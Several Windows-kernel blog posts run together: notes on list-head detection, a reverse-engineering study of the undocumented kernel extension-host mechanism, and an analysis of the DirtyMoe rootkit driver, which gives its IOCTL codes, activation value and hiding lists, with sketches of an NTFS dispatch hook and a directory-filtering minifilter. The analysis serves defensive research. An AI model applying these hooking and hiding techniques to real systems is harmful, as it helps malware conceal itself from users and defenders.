
Adventures in avoiding (list) head

Working with lists is hard. I can never get them right the first time and keep finding myself having to draw them to understand how they work, or forget to advance them in a list and get stuck in a loop. Every single time. Can you believe someone is actually paying me to write code? That runs in the kernel?

Anyway, I worked a lot with lists recently in a few projects that I might publish some day when I find the inner motivation to finish them. And I had the same problem in a few of them — I didn’t start iterating over the list from its head, but from a random item, without knowing where my list head was. And knowing where the list head is can be important.

Take this example — we want to parse the kernel process list and want to get the value of Process->DiskCounters->BytesRead for each process:
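A minimal sketch of that walk, assuming we already hold a pointer to some process in the list (the partial structure layouts below are illustrative only; the real EPROCESS offsets change between builds, so treat this as pseudo-real code):

#include <ntddk.h>

// Illustrative partial definitions -- real field offsets vary per build.
typedef struct _PROCESS_DISK_COUNTERS_PARTIAL {
    ULONGLONG BytesRead;
    // ... other counters omitted ...
} PROCESS_DISK_COUNTERS_PARTIAL;

typedef struct _EPROCESS_PARTIAL {
    // ... many fields omitted ...
    LIST_ENTRY ActiveProcessLinks;
    // ... more fields omitted ...
    PROCESS_DISK_COUNTERS_PARTIAL *DiskCounters;
} EPROCESS_PARTIAL;

// Walk the whole process list, starting from whatever entry we happen to have.
VOID DumpBytesRead(EPROCESS_PARTIAL *SomeProcess)
{
    LIST_ENTRY *entry = &SomeProcess->ActiveProcessLinks;

    do {
        EPROCESS_PARTIAL *process =
            CONTAINING_RECORD(entry, EPROCESS_PARTIAL, ActiveProcessLinks);

        DbgPrint("BytesRead: %llu\n", process->DiskCounters->BytesRead);

        entry = entry->Flink;   // don't forget to advance!
    } while (entry != &SomeProcess->ActiveProcessLinks);
}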

This should work fine for any normal process.

But what will happen when we reach the list head?

The list head is not a part of a real EPROCESS structure and it is surrounded by other, unrelated variables. If we try to treat it like a normal EPROCESS we will read these and might try to use them as pointers and dereference them, which will crash sooner or later.

But a useful thing to remember is that there is one significant difference between the list head and the rest of the list — lists connect data structures that are allocated in the pool, while the list head will be a global variable in the driver that manages the list (in our example, ntoskrnl.exe has nt!PsActiveProcessHead as a global variable, used to access the process list).

There is no easy way that I know of to check if an address is in the pool or not, but we can use a trick and call RtlPcToFileHeader. This function receives an address and writes the base address of the image it’s in into an output parameter. So we can do:
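Something along these lines (a sketch; RtlPcToFileHeader returns the image base, or NULL when the address is not inside any loaded image):

// Returns TRUE if Address lives inside a loaded image -- i.e. it is a global
// variable such as a list head, not a pool-allocated structure.
BOOLEAN IsProbablyListHead(PVOID Address)
{
    PVOID imageBase = NULL;
    return RtlPcToFileHeader(Address, &imageBase) != NULL;
}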

We can also verify that the list head is inside the image it’s supposed to be in, by getting the image base address from a known symbol and comparing:
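For example (a sketch; PsGetCurrentProcessId is used here purely as an arbitrary exported nt routine whose address is known to be inside ntoskrnl, any known nt symbol would work just as well):

// Returns TRUE if Address lies inside the same image as a known ntoskrnl
// export -- in our case, that would make it nt!PsActiveProcessHead.
BOOLEAN IsInsideNtoskrnl(PVOID Address)
{
    PVOID addressBase = NULL;
    PVOID ntBase = NULL;

    RtlPcToFileHeader(Address, &addressBase);
    RtlPcToFileHeader((PVOID)PsGetCurrentProcessId, &ntBase);

    return (addressBase != NULL) && (addressBase == ntBase);
}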

Windows RS3 added the useful RtlPcToFileName function, which makes our code a bit prettier.

Yes, More Callbacks — The Kernel Extension Mechanism

Recently I had to write a kernel-mode driver. This has made a lot of people very angry and been widely regarded as a bad move. (Douglas Adams, paraphrased)

Like any other piece of code written by me, this driver had several major bugs which caused some interesting side effects. Specifically, it prevented some other drivers from loading properly and caused the system to crash.

As it turns out, many drivers assume their initialization routine (DriverEntry) is always successful, and don’t take it well when this assumption breaks. j00ru documented some of these cases a few years ago in his blog, and many of them are still relevant in current Windows versions. However, these buggy drivers are not really the issue here, and j00ru covered it better than I could anyway. Instead I focused on just one of these drivers, which caught my attention and dragged me into researching the so-called “windows kernel host extensions” mechanism.

The lucky driver is Bam.sys (Background Activity Moderator) — a new driver which was introduced in Windows 10 version 1709 (RS3). When its DriverEntry fails mid-way, the call stack leading to the system crash looks like this:

From this crash dump, we can see that Bam.sys registered a process creation callback and forgot to unregister it before unloading. Then, when a process was created / terminated, the system tried to call this callback, encountered a stale pointer and crashed.

The interesting thing here is not the crash itself, but rather how Bam.sys registers this callback. Normally, process creation callbacks are registered via nt!PsSetCreateProcessNotifyRoutine(Ex), which adds the callback to the nt!PspCreateProcessNotifyRoutine array. Then, whenever a process is being created or terminated, nt!PspCallProcessNotifyRoutines iterates over this array and calls all of the registered callbacks. However, if we run, for example, "!wdbgark.wa_systemcb /type process" in WinDbg, we'll see that the callback used by Bam.sys is not found in this array.

Instead, Bam.sys uses a whole other mechanism to register its callbacks.

If we take a look at nt!PspCallProcessNotifyRoutines, we can see an explicit reference to some variable named nt!PspBamExtensionHost (there is a similar one referring to the Dam.sys driver). It retrieves a so-called “extension table” using this “extension host” and calls the first function in the extension table, which is bam!BampCreateProcessCallback.

If we open Bam.sys in IDA, we can easily find bam!BampCreateProcessCallback and search for its xrefs. Conveniently, it only has one, in bam!BampRegisterKernelExtension:

As suspected, bam!BampCreateProcessCallback is not registered via the normal callback registration mechanism. It is actually stored in a function table named bam!BampKernelCalloutTable, which is later passed, together with some other parameters (we’ll talk about them in a minute), to the undocumented nt!ExRegisterExtension function.

I tried to search for any documentation or hints for what this function was responsible for, or what this “extension” is, and couldn’t find much. The only useful resource I found was the leaked ntosifs.h header file, which contains the prototype for nt!ExRegisterExtension as well as the layout of the _EX_EXTENSION_REGISTRATION_1 structure.

Prototype for nt!ExRegisterExtension and _EX_EXTENSION_REGISTRATION_1, as supplied in ntosifs.h:

NTKERNELAPI NTSTATUS ExRegisterExtension (
    _Outptr_ PEX_EXTENSION *Extension,
    _In_ ULONG RegistrationVersion,
    _In_ PVOID RegistrationInfo
);
typedef struct _EX_EXTENSION_REGISTRATION_1 {
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;
    VOID *FunctionTable;
    PVOID *HostInterface;
    PVOID DriverObject;
} EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1;

After a bit of reverse engineering, I figured that the formal input parameter “PVOID RegistrationInfo” is actually of type PEX_EXTENSION_REGISTRATION_1.
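Put together, a driver-side registration presumably looks roughly like this. This is a hedged sketch based only on the declarations above (EX_EXTENSION_REGISTRATION_1 is assumed to be defined as in the ntosifs.h listing); the ID, version, and RegistrationVersion values are placeholders, not the real Bam.sys values:

#include <ntddk.h>

typedef struct _EX_EXTENSION *PEX_EXTENSION;   // opaque handle (assumption)

NTKERNELAPI NTSTATUS ExRegisterExtension(
    _Outptr_ PEX_EXTENSION *Extension,
    _In_ ULONG RegistrationVersion,
    _In_ PVOID RegistrationInfo);

static PVOID g_HostInterface;                  // receives the host's interface table
static VOID ExampleCallout(VOID) { }           // stand-in for a real callout
static PVOID g_CalloutTable[] = { (PVOID)ExampleCallout };

NTSTATUS RegisterExampleExtension(PDRIVER_OBJECT DriverObject)
{
    EX_EXTENSION_REGISTRATION_1 registration = { 0 };
    PEX_EXTENSION extension = NULL;

    registration.ExtensionId      = 0x1234;    // placeholder -- must match a host pre-registered by NTOS
    registration.ExtensionVersion = 1;         // placeholder
    registration.FunctionCount    = (USHORT)RTL_NUMBER_OF(g_CalloutTable);
    registration.FunctionTable    = g_CalloutTable;
    registration.HostInterface    = &g_HostInterface;
    registration.DriverObject     = DriverObject;

    // RegistrationVersion presumably matches the _1 structure revision.
    return ExRegisterExtension(&extension, 1, &registration);
}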

The pseudo-code of nt!ExRegisterExtension is shown in appendix B, but here are the main points:

  1. nt!ExRegisterExtension extracts the ExtensionId and ExtensionVersion members of the RegistrationInfo structure and uses them to locate a matching host in nt!ExpHostList (using the nt!ExpFindHost function, whose pseudo-code appears in appendix B).
  2. Then, the function verifies that the number of functions supplied in RegistrationInfo->FunctionCount matches the expected number set in the host’s structure. It also makes sure that the host’s FunctionTable field has not already been initialized. Basically, this check means that an extension cannot be registered twice.
  3. If everything seems OK, the host’s FunctionTable field is set to point to the FunctionTable supplied in RegistrationInfo.
  4. Additionally, RegistrationInfo->HostInterface is set to point to some data found in the host structure. This data is interesting, and we’ll discuss it soon.
  5. Eventually, the fully initialized host is returned to the caller via an output parameter.

We saw that nt!ExRegisterExtension searches for a host that matches RegistrationInfo. The question now is, where do these hosts come from?

  • During its initialization, NTOS performs several calls to nt!ExRegisterHost. In every call it passes a structure identifying a single driver from a list of predetermined drivers (full list in appendix A). For example, here is the call which initializes a host for Bam.sys:
  • nt!ExRegisterHost allocates a structure of type _HOST_LIST_ENTRY (unofficial name, coined by me), initializes it with data supplied by the caller, and adds it to the end of nt!ExpHostList. The _HOST_LIST_ENTRY structure is undocumented, and looks something like this:
struct _HOST_LIST_ENTRY
{
    _LIST_ENTRY List;
    DWORD RefCount;
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;   // number of callbacks that the extension contains
    POOL_TYPE PoolType;     // where this host is allocated
    PVOID HostInterface;    // table of unexported nt functions, to be used by
                            // the driver to which this extension belongs
    PVOID FunctionAddress;  // optional, rarely used. This callback is called
                            // before and after an extension for this host is
                            // registered / unregistered
    PVOID ArgForFunction;   // will be sent to the function saved here
    _EX_RUNDOWN_REF RundownRef;
    _EX_PUSH_LOCK Lock;
    PVOID FunctionTable;    // a table of the callbacks that the driver "registers"
    DWORD Flags;            // Only uses one bit. Not sure about its meaning.
} HOST_LIST_ENTRY, *PHOST_LIST_ENTRY;
  • When one of the predetermined drivers loads, it registers an extension using nt!ExRegisterExtension and supplies a RegistrationInfo structure containing a table of functions (as we saw Bam.sys doing). This table of functions will be placed in the FunctionTable member of the matching host. These functions will be called by NTOS on certain occasions, which makes them a kind of callback.

Earlier we saw that part of nt!ExRegisterExtension functionality is to set RegistrationInfo->HostInterface (which contains a global variable in the calling driver) to point to some data found in the host structure. Let’s get back to that.

Every driver which registers an extension has a host initialized for it by NTOS. This host contains, among other things, a HostInterface, pointing to a predetermined table of unexported NTOS functions. Different drivers receive different HostInterfaces, and some don’t receive one at all.

For example, this is the HostInterface that Bam.sys receives:

So the “kernel extensions” mechanism is actually a bi-directional communication port: The driver supplies a list of “callbacks”, to be called on different occasions, and receives a set of functions for its own internal use.

To stick with the example of Bam.sys, let’s take a look at the callbacks that it supplies:

  • BampCreateProcessCallback
  • BampSetThrottleStateCallback
  • BampGetThrottleStateCallback
  • BampSetUserSettings
  • BampGetUserSettingsHandle

The host initialized for Bam.sys “knows” in advance that it should receive a table of 5 functions. These functions must be laid out in the exact order presented here, since they are called by index. We can see this in the case where the function found in nt!PspBamExtensionHost->FunctionTable[4] is called.

To conclude, there exists a mechanism to “extend” NTOS by means of registering specific callbacks and retrieving unexported functions to be used by certain predetermined drivers.

I don’t know if there is any practical use for this knowledge, but I thought it was interesting enough to share. If you find anything useful / interesting to do with this mechanism, I’d love to know :)

Appendix A — Extension hosts initialized by NTOS:

Appendix B — functions pseudo-code:

Appendix C — structures definitions:

struct _HOST_INFORMATION
{
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    DWORD FunctionCount;
    POOL_TYPE PoolType;
    PVOID HostInterface;
    PVOID FunctionAddress;
    PVOID ArgForFunction;
    PVOID unk;
} HOST_INFORMATION, *PHOST_INFORMATION;

struct _HOST_LIST_ENTRY
{
    _LIST_ENTRY List;
    DWORD RefCount;
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;   // number of callbacks that the extension contains
    POOL_TYPE PoolType;     // where this host is allocated
    PVOID HostInterface;    // table of unexported nt functions, to be used by
                            // the driver to which this extension belongs
    PVOID FunctionAddress;  // optional, rarely used. This callback is called
                            // before and after an extension for this host is
                            // registered / unregistered
    PVOID ArgForFunction;   // will be sent to the function saved here
    _EX_RUNDOWN_REF RundownRef;
    _EX_PUSH_LOCK Lock;
    PVOID FunctionTable;    // a table of the callbacks that the driver "registers"
    DWORD Flags;            // Only uses one flag. Not sure about its meaning.
} HOST_LIST_ENTRY, *PHOST_LIST_ENTRY;

struct _EX_EXTENSION_REGISTRATION_1
{
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;
    PVOID FunctionTable;
    PVOID *HostTable;
    PVOID DriverObject;
} EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1;


DirtyMoe: Rootkit Driver

11 August 2021 at 09:44

Abstract

In the first post, DirtyMoe: Introduction and General Overview of Modularized Malware, we described DirtyMoe, a complex and sophisticated piece of malware. Its main observed roles are cryptojacking and DDoS attacks, both of which remain popular. There is no doubt that the malware has been released for profit, and all evidence points to Chinese territory. In most cases, the PurpleFox campaign is used to exploit vulnerable systems: the exploit gains the highest privileges and installs the malware via the MSI installer. In short, the installer misuses the Windows System Event Notification Service (SENS) for the malware deployment. At the end of the deployment, two processes (workers) execute malicious activities received from well-concealed C&C servers.

As we mentioned in the first post, every good malware must implement a set of protection, anti-forensics, anti-tracking, and anti-debugging techniques. One of the most used techniques for hiding malicious activity is the use of rootkits. In general, the main goal of a rootkit is to hide itself and other modules of the hosted malware at the kernel layer. Rootkits are potent tools but carry a high risk of being detected, because they work in kernel-mode and each critical bug leads to a BSoD.

The primary aim of this article is to analyze the rootkit techniques that DirtyMoe uses. The main part of this study examines the functionality of the DirtyMoe driver, aiming to provide comprehensive information about the driver in terms of static and dynamic analysis. The key techniques of the DirtyMoe rootkit can be listed as follows: the driver can hide itself and other malware activities in both kernel and user mode; the driver can execute commands received from the user-mode under kernel privileges; another significant aspect of the driver is the injection of an arbitrary DLL file into targeted processes; and, last but not least, the driver can censor the file system content. We also describe the refined routine that deploys the driver into the kernel and the anti-forensic methods the malware authors used.

Another essential point of this research is the investigation of the driver’s metadata, which shows that the driver is code-signed with certificates that were stolen and revoked in the past. However, these certificates are widespread in the wild and are still misused by other malicious software today.

Finally, the last part summarises the rootkit functionality and draws together the key findings about the digital certificates, making a link between DirtyMoe and other malicious software. In addition, we discuss the implementation level and sources of the used rootkit techniques.

1. Sample

The subject of this research is a sample with SHA-256:
AABA7DB353EB9400E3471EAAA1CF0105F6D1FAB0CE63F1A2665C8BA0E8963A05
The sample is a Windows driver that DirtyMoe drops on system startup.

Note: VirusTotal keeps a record of 44 of 71 AV engines (62 %) which detect the sample as malicious. On the other hand, the DirtyMoe DLL file is detected by 86 % of registered AVs. Therefore, the detection coverage is sufficient, since the driver is dumped from the DLL file.

Basic Information
  • File Type: Portable Executable 64
  • File Info: Microsoft Visual C++ 8.0 (Driver)
  • File Size: 116.04 KB (118824 bytes)
  • Digital Signature: Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)
Imports

The driver imports two libraries, FltMgr and ntoskrnl. Table 1 summarizes the most suspicious methods from the driver’s point of view.

Routine Description
FltSetCallbackDataDirty A minifilter driver’s pre-operation or post-operation callback calls this routine to indicate that it has modified the contents of the callback data structure.
FltGetRequestorProcessId Returns the process ID of the process that requested a given I/O operation.
FltRegisterFilter FltRegisterFilter registers a minifilter driver.
ZwDeleteValueKey, ZwSetValueKey, ZwQueryValueKey, ZwOpenKey Routines that delete, set, query, and open registry entries in kernel-mode.
ZwTerminateProcess Routine terminates a process and all of its threads in kernel-mode.
ZwQueryInformationProcess Retrieves information about the specified process.
MmGetSystemRoutineAddress Returns a pointer to a function specified by a routine parameter.
ZwAllocateVirtualMemory Reserves a range of application-accessible virtual addresses in the specified process in kernel-mode.
Table 1. Kernel methods imported by the DirtyMoe driver

At first glance, the driver looks up kernel routines via MmGetSystemRoutineAddress() as a form of obfuscation, since the string table contains routine names operating with virtual memory; e.g., ZwProtectVirtualMemory(), ZwReadVirtualMemory(), ZwWriteVirtualMemory(). The kernel routine ZwQueryInformationProcess() and strings such as services.exe and winlogon.exe point out that the rootkit probably works with kernel structures of the critical Windows processes.
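For reference, this runtime-lookup pattern boils down to a single exported call; a minimal sketch (the routine name is just an example taken from the strings above, and only routines actually exported by ntoskrnl or the HAL can be resolved this way):

#include <ntddk.h>

// Resolve an exported kernel routine by name at runtime instead of importing
// it, which keeps the name out of the import table.
PVOID ResolveRoutine(PCWSTR Name)
{
    UNICODE_STRING routineName;

    RtlInitUnicodeString(&routineName, Name);
    return MmGetSystemRoutineAddress(&routineName);
}

// Example: PVOID fn = ResolveRoutine(L"ZwQueryInformationProcess");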

2. DirtyMoe Driver Analysis

The DirtyMoe driver does not execute any specific malware activities. However, it provides a wide range of rootkit and backdoor techniques. The driver has been designed as a support system for the DirtyMoe service in user-mode.

The driver can perform actions that normally require high privileges, such as writing a file into the system folder, writing to the system registry, killing an arbitrary process, etc. The user-mode malware just sends a defined control code and data to the driver, which then performs the higher-privileged action.

Further, the malware can use the driver to hide some records helping to mask malicious activities. The driver affects the system registry, and can conceal arbitrary keys. Moreover, the system process services.exe is patched in its memory, and the driver can exclude arbitrary services from the list of running services. Additionally, the driver modifies the kernel structures recording loaded drivers, so the malware can choose which driver is visible or not. Therefore, the malware is active, but the system and user cannot list the malware records using standard API calls to enumerate the system registry, services, or loaded drivers. The malware can also hide requisite files stored in the file system since the driver implements a mechanism of the minifilter. Consequently, if a user requests a record from the file system, the driver catches this request and can affect the query result that is passed to the user.

The driver consists of 10 main functionalities as Table 2 illustrates.

Function Description
Driver Entry routine called by the kernel when the driver is loaded.
Start Routine is run as a kernel thread restoring the driver configuration from the system registry.
Device Control processes system-defined I/O control codes (IOCTLs) controlling the driver from the user-mode.
Minifilter Driver routine completes processing for one or more types of I/O operations; QueryDirectory in this case. In other words, the routine filters folder enumerations.
Thread Notification routine registers a driver-supplied callback that is notified when a new thread is created.
Callback of NTFS Driver wraps the original callback of the NTFS driver for IRP_MJ_CREATE major function.
Registry Hiding is a hook method that provides registry key hiding.
Service Hiding is a routine hiding a defined service.
Driver Hiding is a routine hiding a defined driver.
Driver Unload routine is called by the kernel when the driver is unloaded.
Table 2. Main driver functionality

Most of the implemented functionalities are available as public samples on internet forums. The level of programming skills is different for each driver functionality. It seems that the driver author merged the public samples in most cases. Therefore, the driver contains a few bugs and unused code. The driver is still in development, and we will probably find other versions in the wild.

2.1 Driver Entry

The Driver Entry is the first routine called by the kernel after the driver is loaded. The driver initializes a large number of global variables for its proper operation. Firstly, the driver detects the OS version and sets up the required offsets for further malicious use. Secondly, the variable pointing to the driver image is initialized; the driver image is used for hiding the driver. The driver also associates the following major functions:

  1. IRP_MJ_CREATE, IRP_MJ_CLOSE – no action of interest,
  2. IRP_MJ_DEVICE_CONTROL – used for driver configuration and control,
  3. IRP_MJ_SHUTDOWN – writes malware-defined data into the disk and registry.

The Driver Entry creates a symbolic link to the driver and tries to associate it with other malicious monitoring or filtering callbacks. The first one is a minifilter activated by the FltRegisterFilter() method, which registers FltPostOperation(); this filters access to the system drives and allows the driver to hide files and directories.

Further, the initialization method swaps the IRP_MJ_CREATE major function of the \FileSystem\Ntfs driver. As a result, each API call of CreateFile(), or of the kernel-mode function IoCreateFile(), can be monitored and affected by the malicious MalNtfsCreatCallback() callback.
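The swap itself is a classic trick; a hedged sketch of how it is typically done (ObReferenceObjectByName is undocumented but exported, so it is declared manually here; this is an illustration of the technique, not DirtyMoe's decompiled code):

// Undocumented, but exported by ntoskrnl.
extern POBJECT_TYPE *IoDriverObjectType;

NTSTATUS ObReferenceObjectByName(PUNICODE_STRING ObjectName, ULONG Attributes,
                                 PACCESS_STATE AccessState, ACCESS_MASK DesiredAccess,
                                 POBJECT_TYPE ObjectType, KPROCESSOR_MODE AccessMode,
                                 PVOID ParseContext, PVOID *Object);

DRIVER_DISPATCH MalNtfsCreatCallback;          // the malicious replacement
static PDRIVER_DISPATCH g_OriginalNtfsCreate;  // saved original handler

NTSTATUS HookNtfsCreate(VOID)
{
    UNICODE_STRING ntfsName = RTL_CONSTANT_STRING(L"\\FileSystem\\Ntfs");
    PDRIVER_OBJECT ntfsDriver = NULL;
    NTSTATUS status;

    status = ObReferenceObjectByName(&ntfsName, OBJ_CASE_INSENSITIVE, NULL, 0,
                                     *IoDriverObjectType, KernelMode, NULL,
                                     (PVOID *)&ntfsDriver);
    if (!NT_SUCCESS(status)) {
        return status;
    }

    // Save the original IRP_MJ_CREATE handler and swap in the malicious one.
    g_OriginalNtfsCreate = ntfsDriver->MajorFunction[IRP_MJ_CREATE];
    ntfsDriver->MajorFunction[IRP_MJ_CREATE] = MalNtfsCreatCallback;

    ObDereferenceObject(ntfsDriver);
    return STATUS_SUCCESS;
}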

Another Driver Entry step sets a callback method using PsSetCreateThreadNotifyRoutine(). The NotifyRoutine() monitors thread creation in the system, and the malware can inject malicious code into newly created processes/threads.

Finally, the driver tries to restore its configuration from the system registry.

2.2 Start Routine

The Start Routine is run as a kernel system thread created in the Driver Entry routine. The Start Routine writes the driver version into the SYSTEM registry as follows:

  • Key: HKLM\SYSTEM\CurrentControlSet\Control\WinApi\WinDeviceVer
  • Value: 20161122

If the following SOFTWARE registry key is present, the driver loads artifacts needed for the process injecting:

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Secure

The last part of Start Routine loads the rest of the necessary entries from the registry. The complete list of the system registry is documented in Appendix A.

2.3 Device Control

The device control is a mechanism for controlling a loaded driver. A driver receives the IRP_MJ_DEVICE_CONTROL I/O control code (IOCTL) if a user-mode thread calls the Win32 API DeviceIoControl(); see [1] for more information. The user-mode application sends IRP_MJ_DEVICE_CONTROL directly to a specific device driver, and the driver then performs the corresponding operation. Therefore, malicious user-mode applications can control the driver via this mechanism.
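From the user-mode side, this boils down to a DeviceIoControl() call. A hedged sketch (the device's symbolic-link name and the input-buffer layout are assumptions; only the IOCTL and authorization values come from Table 3 below):

#include <windows.h>

BOOL ActivateDriver(void)
{
    HANDLE device = CreateFileW(L"\\\\.\\ExampleDeviceLink",    // hypothetical symbolic link
                                GENERIC_READ | GENERIC_WRITE,
                                0, NULL, OPEN_EXISTING, 0, NULL);
    if (device == INVALID_HANDLE_VALUE) {
        return FALSE;
    }

    DWORD auth = 0xB6C7C230;       // activation code, per Table 3 below
    DWORD bytesReturned = 0;
    BOOL ok = DeviceIoControl(device,
                              0x222C80,   // "activate" IOCTL, per Table 3 below
                              &auth, sizeof(auth),
                              NULL, 0,
                              &bytesReturned, NULL);

    CloseHandle(device);
    return ok;
}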

The driver supports approx. 60 control codes. We divided the control codes into 3 basic groups: controlling, inserting, and setting.

Controlling

There are 9 main control codes invoking driver functionality from the user-mode. The following Table 3 summarizes controlling IOCTL that can be sent by malware using the Win32 API.

IOCTL Description
0x222C80 The driver accepts other IOCTLs only if the driver is activated. Malware in the user-mode can activate the driver by sending this IOCTL and an authorization code equal to 0xB6C7C230.
0x2224C0 The malware sends data which the driver writes to the system registry. The key, value, and data type are set via the Setting control codes. (used variables: regKey, regValue, regData, regType)
0x222960 This IOCTL clears all data stored by the driver. (used variables: see the Setting and Inserting variables)
0x2227EC If the malware needs to hide a specific driver, the driver adds that driver’s name to listBaseDllName and hides it using Driver Hiding.
0x2227E8 The driver adds the name of the registry key to the WinDeviceAddress list and hides this key using Registry Hiding. (used variable: WinDeviceAddress)
0x2227F0 The driver hides a given service defined by the name of its DLL image. The name is inserted into the listServices variable, and the Service Hiding technique hides the service in the system.
0x2227DC If the malware wants to deactivate Registry Hiding, the driver restores the original kernel GetCellRoutine().
0x222004 The malware sends the ID of a process it wants to terminate. The driver calls the kernel function ZwTerminateProcess() and terminates the process and all of its threads regardless of the malware’s privileges.
0x2224C8 The malware sends data which the driver writes to the file defined by the filePath variable; see the Setting control codes. (used variables: filePath, fileData)
Table 3. Controlling IOCTLs
Inserting

There are 11 control codes inserting items into white/blacklists. The following Table 4 summarizes variables and their purpose.

White/Black list Variable Purpose
Registry HIVE WinDeviceAddress Defines a list of registry entries that the malware wants to hide in the system.
Process Image File Name WinDeviceMaker Represents a whitelist of processes defined by process image file name. It is used in Callback of NTFS Driver, and grants access to the NTFS file systems. Further, it operates in Minifilter Driver and prevents hiding files defined in the WinDeviceNumber variable. The last use is in Registry Hiding; the malware does not hide registry keys for the whitelisted processes.
WinDeviceMakerB Defines a whitelist of processes defined by process image file name. It is used in Callback of NTFS Driver, and grants access to the NTFS file systems.
WinDeviceMakerOnly Specifies a blacklist of processes defined by the process image file name. It is used in Callback of NTFS Driver and refuses access to the NTFS file systems.
File names (full path) WinDeviceName, WinDeviceNameB Determines a whitelist of files that should be granted access by Callback of NTFS Driver. It is used in combination with WinDeviceMaker and WinDeviceMakerB. So, if a file is on the whitelist and a requesting process is also whitelisted, the driver grants access to the file.
WinDeviceNameOnly Defines a blacklist of files that should be denied access by Callback of NTFS Driver. It is used in combination with WinDeviceMakerOnly. So, if a file is on the blacklist and a requesting process is also blacklisted, the driver refuses access to the file.
File names (containing number) WinDeviceNumber Defines a list of files that should be hidden in the system by Minifilter Driver. The malware uses a naming convention as follows: [A-Z][a-z][0-9]+\.[a-z]{3}. So, a file name includes a number.
Process ID ListProcessId1 Defines a list of processes requiring access to NTFS file systems. The malware does not restrict the access for these processes; see Callback of NTFS Driver.
ListProcessId2 The same purpose as ListProcessId1. Additionally, it is used as the whitelist for the registry hiding, so the driver does not restrict access. The Minifilter Driver does not limit processes in this list.
Driver names listBaseDllName Defines a list of drivers that should be hidden in the system; see Driver Hiding.
Service names listServices Specifies a list of services that should be hidden in the system; see Service Hiding.
Table 4. White and Black lists
Setting

The setting control codes store scalar values as a global variable. The following Table 5 summarizes and groups these variables and their purpose.

Function Variable Description
File Writing (Shutdown) filename1_for_ShutDown, data1_for_ShutDown Defines a file name and data for the first file written during the driver shutdown.
filename2_for_ShutDown, data2_for_ShutDown Defines a file name and data for the second file written during the driver shutdown.
Registry Writing (Shutdown) regKey1_shutdown, regValue1_shutdown, regData1_shutdown, regType1 Specifies the first registry key path, value name, data, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.) written during the driver shutdown.
regKey2_shutdown, regValue2_shutdown, regData2_shutdown, regType2 Specifies the second registry key path, value name, data, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.) written during the driver shutdown.
File Data Writing filePath Determines the filename which will be used to write data; see Controlling IOCTL 0x2224C8.
Registry Writing regKey, regValue, regType Specifies the registry key path, value name, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.); see Controlling IOCTL 0x2224C0.
Unknown (unused) dwWinDevicePathA, dwWinDeviceDataA Keeps a path and data for file A.
dwWinDevicePathB, dwWinDeviceDataB Keeps a path and data for file B.
Table 5. Global driver variables

The following Table 6 summarizes variables used for the process injection; see Thread Notification.

Function Variable Description
Process to Inject dwWinDriverMaker2, dwWinDriverMaker2_2 Defines two command-line arguments. If a process with one of the arguments is created, the driver should inject the process.
dwWinDriverMaker1, dwWinDriverMaker1_2 Defines two process names that should be injected if the process is created.
DLL to Inject dwWinDriverPath1, dwWinDriverDataA Specifies a file name and data for the process injection defined by dwWinDriverMaker2 or dwWinDriverMaker1.
dwWinDriverPath1_2, dwWinDriverDataA_2 Defines a file name and data for the process injection defined by dwWinDriverMaker2_2 or dwWinDriverMaker1_2.
dwWinDriverPath2, dwWinDriverDataB Keeps a file name and data for the process injection defined by dwWinDriverMaker2 or dwWinDriverMaker1.
dwWinDriverPath2_2, dwWinDriverDataB_2 Specifies a file name and data for the process injection defined by dwWinDriverMaker2_2 or dwWinDriverMaker1_2.
Table 6. Injection variables

2.4 Minifilter Driver

The minifilter driver is registered in the Driver Entry routine using the FltRegisterFilter() method. One of the method arguments defines configuration (FLT_REGISTRATION) and callback methods (FLT_OPERATION_REGISTRATION). If the QueryDirectory system request is invoked, the malware driver catches this request and processes it by its FltPostOperation().
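For orientation, this is the standard filter-manager registration pattern; a minimal sketch with illustrative names (it is not DirtyMoe's code, and it assumes the usual minifilter installation details, such as an altitude, are handled elsewhere):

#include <fltKernel.h>

static PFLT_FILTER g_Filter;

FLT_POSTOP_CALLBACK_STATUS MalFltPostOperation(
    PFLT_CALLBACK_DATA Data,
    PCFLT_RELATED_OBJECTS FltObjects,
    PVOID CompletionContext,
    FLT_POST_OPERATION_FLAGS Flags)
{
    UNREFERENCED_PARAMETER(FltObjects);
    UNREFERENCED_PARAMETER(CompletionContext);
    UNREFERENCED_PARAMETER(Flags);

    // Only directory enumerations are of interest.
    if (Data->Iopb->MinorFunction == IRP_MN_QUERY_DIRECTORY) {
        // ... filter / remove entries from the enumeration buffer here ...
    }
    return FLT_POSTOP_FINISHED_PROCESSING;
}

static const FLT_OPERATION_REGISTRATION Callbacks[] = {
    { IRP_MJ_DIRECTORY_CONTROL, 0, NULL, MalFltPostOperation },
    { IRP_MJ_OPERATION_END }
};

static const FLT_REGISTRATION FilterRegistration = {
    sizeof(FLT_REGISTRATION),       // Size
    FLT_REGISTRATION_VERSION,       // Version
    0,                              // Flags
    NULL,                           // ContextRegistration
    Callbacks,                      // OperationRegistration
    // remaining callbacks (unload, instance setup, ...) left NULL
};

NTSTATUS RegisterMinifilter(PDRIVER_OBJECT DriverObject)
{
    NTSTATUS status = FltRegisterFilter(DriverObject, &FilterRegistration, &g_Filter);
    if (NT_SUCCESS(status)) {
        status = FltStartFiltering(g_Filter);
        if (!NT_SUCCESS(status)) {
            FltUnregisterFilter(g_Filter);
        }
    }
    return status;
}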

The FltPostOperation() method can modify a result of the QueryDirectory operations (IRP). In fact, the malware driver can affect (hide, insert, modify) a directory enumeration. So, some applications in the user-mode may not see the actual image of the requested directory.

